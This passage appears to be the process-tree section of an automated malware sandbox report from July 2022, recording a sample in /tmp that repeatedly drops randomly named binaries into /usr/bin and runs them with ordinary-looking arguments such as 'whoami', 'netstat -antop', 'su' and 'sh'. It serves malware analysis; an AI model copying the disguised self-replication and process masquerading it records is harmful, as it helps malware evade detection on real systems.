                                                            Arguments:/usr/bin/pnljtnsppb "grep \"A\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:/usr/bin/pnljtnsppb "netstat -antop" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:/usr/bin/lhyaaotaph "route -n" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:/usr/bin/lhyaaotaph id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:/usr/bin/lhyaaotaph whoami 9446
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:/usr/bin/lhyaaotaph ifconfig 9446
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:/usr/bin/lhyaaotaph "grep \"A\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:49
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/lhyaaotaph
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:8b0c232594f545d682d180475cf5aa04

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:/usr/bin/otigswehlv "sleep 1" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:/usr/bin/otigswehlv "route -n" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:/usr/bin/otigswehlv sh 9446
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:/usr/bin/otigswehlv "cat resolv.conf" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:/usr/bin/otigswehlv "netstat -antop" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/otigswehlv
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:2228daad34272962a9c0b67789ea5e77

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:/usr/bin/thzryslebl gnome-terminal 9446
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:/usr/bin/thzryslebl "cat resolv.conf" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:/usr/bin/thzryslebl sh 9446
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:/usr/bin/thzryslebl id 9446
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:/usr/bin/thzryslebl "echo \"find\"" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:49:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/thzryslebl
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:e3cb568f026ace3642e8e03b7d58acfa

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:/usr/bin/sunvkgnszw "ifconfig eth0" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:/usr/bin/sunvkgnszw "cd /etc" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:/usr/bin/sunvkgnszw uptime 9446
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:/usr/bin/sunvkgnszw "ls -la" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:/usr/bin/sunvkgnszw id 9446
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:04
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/sunvkgnszw
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:3c729bbc723a5ec2053509a8a7b8f520

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:/usr/bin/yclsxhkbli pwd 9446
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:/usr/bin/yclsxhkbli "route -n" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:/usr/bin/yclsxhkbli "route -n" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:/usr/bin/yclsxhkbli uptime 9446
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:/usr/bin/yclsxhkbli "cat resolv.conf" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:09
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yclsxhkbli
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:595277e5113341b08e8774d7eff08b83

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:/usr/bin/nvlkgshfzs uptime 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:/usr/bin/nvlkgshfzs su 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:/usr/bin/nvlkgshfzs "netstat -an" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:/usr/bin/nvlkgshfzs "echo \"find\"" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:/usr/bin/nvlkgshfzs "ifconfig eth0" 9446
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:14
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/nvlkgshfzs
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:5a99f637c7edead59c4587f692d6b428

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:/usr/bin/wgerzwaeqg whoami 9446
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:n/a
                                                            File size:625900 bytes
                                                            MD5 hash:26f4791e4abad1456b3c4b154d2d2918

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:50:19
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgerzwaeqg
                                                            Arguments:/usr/bin/wgerzwaeqg "route -n" 9446
                                                            File size:625900 bytes
